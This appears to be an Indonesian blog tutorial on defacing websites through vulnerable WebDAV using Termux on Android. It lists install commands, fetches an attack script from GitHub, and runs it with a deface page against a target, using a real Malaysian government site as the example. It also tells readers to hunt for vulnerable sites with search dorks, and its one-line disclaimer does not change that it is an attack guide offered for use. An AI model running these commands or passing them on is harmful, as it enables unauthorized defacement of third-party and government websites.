Breaking News

DEFACE WEBDAV MENGGUNAKAN TERMUX TERBARU


Halohaa brader, sudah lama ya gua ga update tentang deface. deface itu apa min? deface adalah salah satu teknik hacking dengan merubah tampilan halaman pada suatu website, biasanya aksi ini dilakukan dengan bertujuan untuk menyampaikan pesan kepada pihak terkait. sebenernya gua pun udah sering memberikan teknik deface dengan berbagai cara, bisa kalian cek di artikel gua lainnya ya sob. Terus termux itu apa min? Termux adalah aplikasi android untuk menjalankan sebuah script, salah satunya script deface.

Sebelum melakukan teknik webdav ini, kalian harus mencari target website terlebih dahulu, untuk caranya ada di artikel gua yang lain (kalian cek aja sendiri yaa haha). Kemudian selain itu kamu juga harus siapkan script deface dengan format (.html). Jika kamu belum memiliki script deface, tak perlu khawatir, gua sudah menyediakannya secara gratis. Tanpa berlama-lama lagi langsung kita praktekin saja ya sob.

1. Install source code webdav ke termux

Silahkan kamu buka dan jalankan termuxnya terlebih dulu, lalu lakukan dengan menggunakan perintah berikut :

pkg install wget python2 openssh libcurl openssl curl

pip2 install urllib3 chardet certifi idna requests

wget https://raw.githubusercontent.com/storiku/webdav/master/webdav.py

lalu kalian tekan enter pada setiap perintah.

2. Siapkan script deface terbaik

Perlu kamu ingat ya, script deface ini kamu simpan dengan menggunakan format (.html). Kemudian kamu taro filenya pada diluar folder penyimpanan. Lalu kamu masuk lagi kedalam apl termuxnya dan lakukan perintah berikut :

termux-setup-storage
cp -f /sdcard/namascriptkamu.html
$HOME

contoh : 
cp -f /sdcard/elvari.html

terus jika ada notifikasi yang muncul, maka izinkan saja ya.

3. Run script webdav untuk deface

Silahkan kamu ketik perintah berikut :

python2 webdav.py webtarget scriptdeface.html

misalkan contohnya :

python2 webdav.py https://www.malaysia.gov.my/ elvari.html

perlu diingat ya, website targetnya haruslah yang vuln webdav, silahkan kamu cek dan cari sendiri targetnya dengan dork yang fresh. Apabila sudah terdeteksi vuln, maka akan berhasil. Untuk melihat hasilnya, kalian bisa akses link yang sudah tertera pada script tadi.

mungkin sudah sampai disini dulu ya sob, semoga bisa dimengerti, itu gua kasih cara yang mudah dan simpelnya saja, jika kurang mengerti silahkan tanyakan pada kolom komentar. Ingat sebelum melakukan ini harap gunakan dengan sebijak dan sebaik mungkin, gua tidak bertanggung jawab jika nantinya terjadi masalah dengan pihak terkait. Akhir kata terima kasih sobbb.

Tidak ada komentar:

Diberdayakan oleh Blogger.